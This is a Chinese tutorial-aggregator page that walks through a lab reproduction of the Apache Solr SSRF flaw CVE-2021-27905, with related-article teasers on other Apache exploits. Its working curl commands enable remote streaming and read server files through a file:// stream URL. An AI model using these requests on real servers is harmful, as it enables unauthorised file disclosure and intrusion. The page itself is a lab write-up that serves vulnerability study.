首页 / APACHE / Apache Solr SSRF 漏洞(CVE-2021-27905)复现

Apache Solr SSRF 漏洞(CVE-2021-27905)复现

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Apache Solr SSRF 漏洞(CVE-2021-27905)复现，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1230字，纯文字阅读大概需要2分钟。

内容图文

漏洞概述

Apache Solr是一个开源的搜索服务，使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器，是Apache Lucene项目的开源企业搜索平台。

该漏洞是由于没有对输入的内容进行校验，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行SSRF攻击，最终造成任意读取服务器上的文件。

影响版本

Apache Solr <= 8.8.1

环境搭建

http://archive.apache.org/dist/lucene/solr/8.8.1/

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

解压完成后，进入bin目录，执行

solr start -p 8983

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

访问your-ip:8983即可看到页面

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

点击左侧的Core Admin来创建一个Core，可以发现报错

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

此时Solr已经在server/solr目录下已经创建了名字为new_core的文件夹，我们只需要把server/solr/configsets/default文件夹下的conf目录整个拷贝到new_core文件夹下，即可

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

此时即可创建成功

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

漏洞复现

通过http://192.168.1.103:8983/solr/admin/cores?indexInfo=false&wt=json可以看到core的名字

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

通过Solr提供的API可以开启远程开启文件流读取

curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.1.103:8983/solr/new_core/config -H 'Content-type:application/json'

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

读取本机的hosts的文件

curl "http://192.168.1.103:8983/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

Apache Solr SSRF 漏洞(CVE-2021-27905)复现 - 文章图片

修复建议

升级到最新版本

下载地址：

https://solr.apache.org/downloads.html

内容总结

以上是互联网集市为您收集整理的Apache Solr SSRF 漏洞(CVE-2021-27905)复现全部内容，希望文章能够帮你解决Apache Solr SSRF 漏洞(CVE-2021-27905)复现所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/1007748.html

来源：【匿名】

【上一篇】痞子衡嵌入式：开源软件协议(MIT/BSD/Apache/LGPL/MPL/GPL)【下一篇】Apache2的httpd.conf翻译

更多 ►

【Apache Solr SSRF 漏洞(CVE-2021-27905)复现】教程文章相关的互联网学习教程文章

[CVE-2020-1956] Apache Kylin远程命令执行漏洞复现【代码】

Apache Kylin是一个开源的、分布式的分析型数据仓库，提供Hadoop/Spark之上的 SQL 查询接口及多维分析（OLAP）能力以支持超大规模数据，最初由 eBay 开发并贡献至开源社区。它能在亚秒内查询巨大的表。0x00 漏洞概述漏洞编号：CVE-2020-1956。Apache Kylin中存在一些RESTful API，可以将操作系统指令与用户输入的字符串拼接起来。由于未对用户输入内容做充分校验，攻击者可以构造任意系统命令执行。影响版本：Kylin 2.3.0-2.3.2Kyl...

Apache Flink 任意jar包上传漏洞【图】

目前受影响版本：version 1.9.1(最新)，官方未发布补丁。Apache Flink仪表板- >上传恶意的JAR- >提交新工作- >getshell 生成jar包，用nc监听，上传jar包，运行原文：https://www.cnblogs.com/Hydraxx/p/12052064.html

漏洞复现——Apache Flink任意文件读取（CVE-2020-17519）【代码】【图】

一、漏洞概述：CVE-2020-17519——Apache Flink 1.11.0中引入的更改（以及1.11.1和1.11.2中也发布）允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。二、影响版本：Apache Flink : 1.11.0-1.11.2三、环境搭建：延用CVE-2020-17518的环境（Apache Flink 1.11.2）四、漏洞复现：抓取Job Manager的请求包　　2.扔到Repeater模块，修改请求包，查看敏感信息/jobmanager/logs/..%252f..%252f..%252f.....

Apache ActiveMQ Fileserver远程代码执行漏洞【代码】【图】

扫端口的时候遇到8161端口，输入admin/admin，成功登陆,之前就看到过相关文章，PUT了一句话上去，但是没有什么效果，于是本地搭建了一个环境，记录一下测试过程。环境搭建：ActiveMQ 5.1.0 下载地址：http://activemq.apache.org/activemq-510-release.html解压后，双击运行abtivemq.bat运行。（进入bin目录，根据自己的操作系统选择win32或win64，5.1.0只有win32目录）访问8161端口：漏洞利用：1、获取物理路径PUT /fileserver/%...

apache httpd解析漏洞复现【图】

实验环境：win10下运行phpstudy漏洞描述：（1）apache在解析文件时有一个原则：当碰到不认识的扩展名时，将会从后往前解析，直到遇到认识的扩展名为止（2）如果都不认识将会暴露源码。在apache配置不当的时候就会造成apache解析漏洞。复现过程：1、在httpd.conf里加入一句AddHandler application/x-httpd-php .php 2、在WWW目录下创建一个不能解析的后缀的文件为了简便，文件里放一个<?php phpinfo();?>就行 3、访问...

Apache2月9日邮件提示：Tomcat请求漏洞（Request Smuggling）

官方邮件原文：http://mail-archives.apache.org/mod_mbox/www-announce/201502.mbox/%3C54D87A0F.7010400@apache.org%3ECVE编码：CVE-2014-0227 漏洞名称：Request Smuggling危害程度：重要！影响的版本包括：- - Apache Tomcat 8.0.0-RC1 to 8.0.8- - Apache Tomcat 7.0.0 to 7.0.54- - Apache Tomcat 6.0.0 to 6.0.41漏洞描述：通过在chucked请求中包含一个非正常的chunk数据有可能导致Tomcat将该请求的部分数据当成一个新请求。...

漏洞复现——Apache Shiro 反序列化漏洞（CVE-2016-4437）【代码】【图】

Apache Shiro反序列化漏洞一、漏洞概述： shiro默认使用CookieRememberMeManager，对rememberMe的cookie做了加密处理，在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是：（1）获取rememberMe cookie （2）base64 解码（3）AES解密（加密密钥硬编码）（4）反序列化（未作过滤处理）但是AES加密的密钥Key被硬编码(密钥初始就...

CVE-2019-0193：Apache Solr 远程命令执行漏洞复现【代码】【图】

漏洞背景 2019年8月1日，Apache Solr官方发布了CVE-2019-0193漏洞预警，漏洞危害评级为严重影响范围 Apache Solr < 8.2.0 利用工具 burpsuite 漏洞原因　　 Apache solr 是一款开源的搜索服务器并且使用java语言开发；主要的工作方式：用户通过http请求像搜索引擎发出索引条件，solr对条件进行分词处理，根据分词结果查找索引，继而找到文档在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本，因此存在安全隐...

网站（apache+php）被黑客攻击，被上传了好多PHP探针和webshell脚本，黑客从什么路径上传的这些文件？不打算去找程序漏洞，怎么解决？

回复内容：谢邀以下两步是服务器安全防护基础中的基础使用沙箱（sandbox）/强制访问控制（mandatory access control）方案，关闭apache进程所有不必要的路径访问、文件读写和进程执行权限。Linux下对应是SELinux和AppArmor使用最低级别的帐号启动apache进程。使用setcap给apache的执行文件（httpd）监听1024以内端口的权限『他不知道黑客从什么路径上传的这些文件，也不打算去找程序漏洞。』那办法只剩『关掉服务器』加防火墙了吗...

Apache泄露重写的任意文件漏洞_MySQL

Apache 涉及程序： mod_rewrite 描述： Apache泄露重写的任意文件漏洞详细：在Apache1.2以及以后的版本中存在一个mod_rewrite模块，它用来指定特殊URLS在网络服务器文件系统上所映射的绝对路径。如果传送一个包含正确表达参数的重写规则，攻击者就可以查看目标主机上的任意文件。下面举例说明重写规则指令（其中第一行只有是包含漏洞的）： RewriteRule /test/(.*) /usr/local/data/test-stuff/$1 RewriteRule /more-icons/(...

apachetomcat的snoopservlet漏洞_MySQL

ApacheTomcatservlet bugtraq id 1500 class Access Validation Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published July 24, 2000 updated July 24, 2000 vulnerable IBM Websphere Application Server 3.0.21 - Sun Solaris 8.0 - Microsoft Windows NT 4.0 - Linux kernel 2.3.x - IBM AIX 4.3 IBM Websphere Application Server 3.0 - Sun Solaris 8.0 - Novell Netware 5.0 - Microsoft Windows NT 4.0 -...

Apache SSI 远程命令执行漏洞【图】

在测试任意文件上传漏洞的时候，目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持，我们可以上传一个shtml文件，并利用语法执行任意命令。漏洞环境运行一个支持SSI与CGI的Apache服务器：环境启动后，访问http://your-ip:8080/upload.php，即可看到一个上传表单。漏洞复现正常上传PHP文件是不允许的，我们可以上传一个shell.shtml文件：成功上传，然后访问shell.shtml，可...

Apache Solr SSRF 漏洞(CVE-2021-27905)复现【代码】【图】

漏洞概述 Apache Solr是一个开源的搜索服务，使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器，是Apache Lucene项目的开源企业搜索平台。该漏洞是由于没有对输入的内容进行校验，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行SSRF攻击，最终造成任意读取服务器上的文件。影响版本 Apache Solr <= 8.8.1 环境搭建 http://archive.apache.org/dist/lucene/solr/8.8.1/解压完成后，进入bin目录，执行...

WordPress 和 Apache Struts 成为 2019 年漏洞最多的 Web 组件原【图】

Change 嘶吼专业版一项分析发现，WordPress和ApacheStruts网络框架是2019年网络犯罪分子最关注的目标。WordPress和Apache Struts漏洞是2019年网络和应用程序框架中网络犯罪分子最关注的漏洞-而输入验证漏洞超越了跨站点脚本（XSS），成为受***最多的漏洞类型。RiskSense Spotlight 报告分析了2010年至2019年11月之间的1,622个漏洞。Web框架简化了应用程序和网站的开发和部署。Web框架可以为开发人员的许多常见任务提供现成的构建块...

Apache Druid 命令执行漏洞(CVE-2021-25646) 复现【代码】【图】

0x01 漏洞概述在Druid 0.20.0及更低版本中，用户发送恶意请求，利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码，控制服务器。 0x02 影响范围 Apache Druid < 0.20.1 0x03 环境搭建 docker拉取镜像并运行容器 sudo docker pull fokkodriesprong/docker-druid docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid0x04 漏洞复现进入环境后，点击左上角"Load data" -> "Load disk"如下图在...

SOLR - 相关标签

solr

APACHE - 最热教程

php服务器环境搭建配置(apache与iis两种...Ubuntu14.04下搭建LANMP环境(Apache+Ng...mac机启动apache出现问题启动不了 PY4J.PROTOCOL.PY4JERROR: ORG.APACHE....CentOS7中apache与php7及mysql5.7的安装...求助nginx伪静态规则转为apache PHP5.3.1安装教程[基于Windows下Apache...WAMP5中Apache服务总是启动不了,该怎么...Apache缓存相关配置_PHP教程 Apache2.4文件上传失败

首页 / APACHE / Apache Solr SSRF 漏洞(CVE-2021-27905)复现

Apache Solr SSRF 漏洞(CVE-2021-27905)复现

内容导读

内容图文

漏洞概述

影响版本

环境搭建

漏洞复现

修复建议

内容总结

内容备注

内容手机端

【Apache Solr SSRF 漏洞(CVE-2021-27905)复现】教程文章相关的互联网学习教程文章

[CVE-2020-1956] Apache Kylin远程命令执行漏洞复现【代码】

Apache Flink 任意jar包上传漏洞【图】

漏洞复现——Apache Flink任意文件读取（CVE-2020-17519）【代码】【图】

Apache ActiveMQ Fileserver远程代码执行漏洞【代码】【图】

apache httpd解析漏洞复现【图】

Apache2月9日邮件提示：Tomcat请求漏洞（Request Smuggling）

漏洞复现——Apache Shiro 反序列化漏洞（CVE-2016-4437）【代码】【图】

CVE-2019-0193：Apache Solr 远程命令执行漏洞复现【代码】【图】

网站（apache+php）被黑客攻击，被上传了好多PHP探针和webshell脚本，黑客从什么路径上传的这些文件？不打算去找程序漏洞，怎么解决？

Apache泄露重写的任意文件漏洞_MySQL

apachetomcat的snoopservlet漏洞_MySQL

Apache SSI 远程命令执行漏洞【图】

Apache Solr SSRF 漏洞(CVE-2021-27905)复现【代码】【图】

WordPress 和 Apache Struts 成为 2019 年漏洞最多的 Web 组件原【图】

Apache Druid 命令执行漏洞(CVE-2021-25646) 复现【代码】【图】

APACHE - 相关标签

SOLR - 相关标签

APACHE - 最新教程

APACHE - 最热教程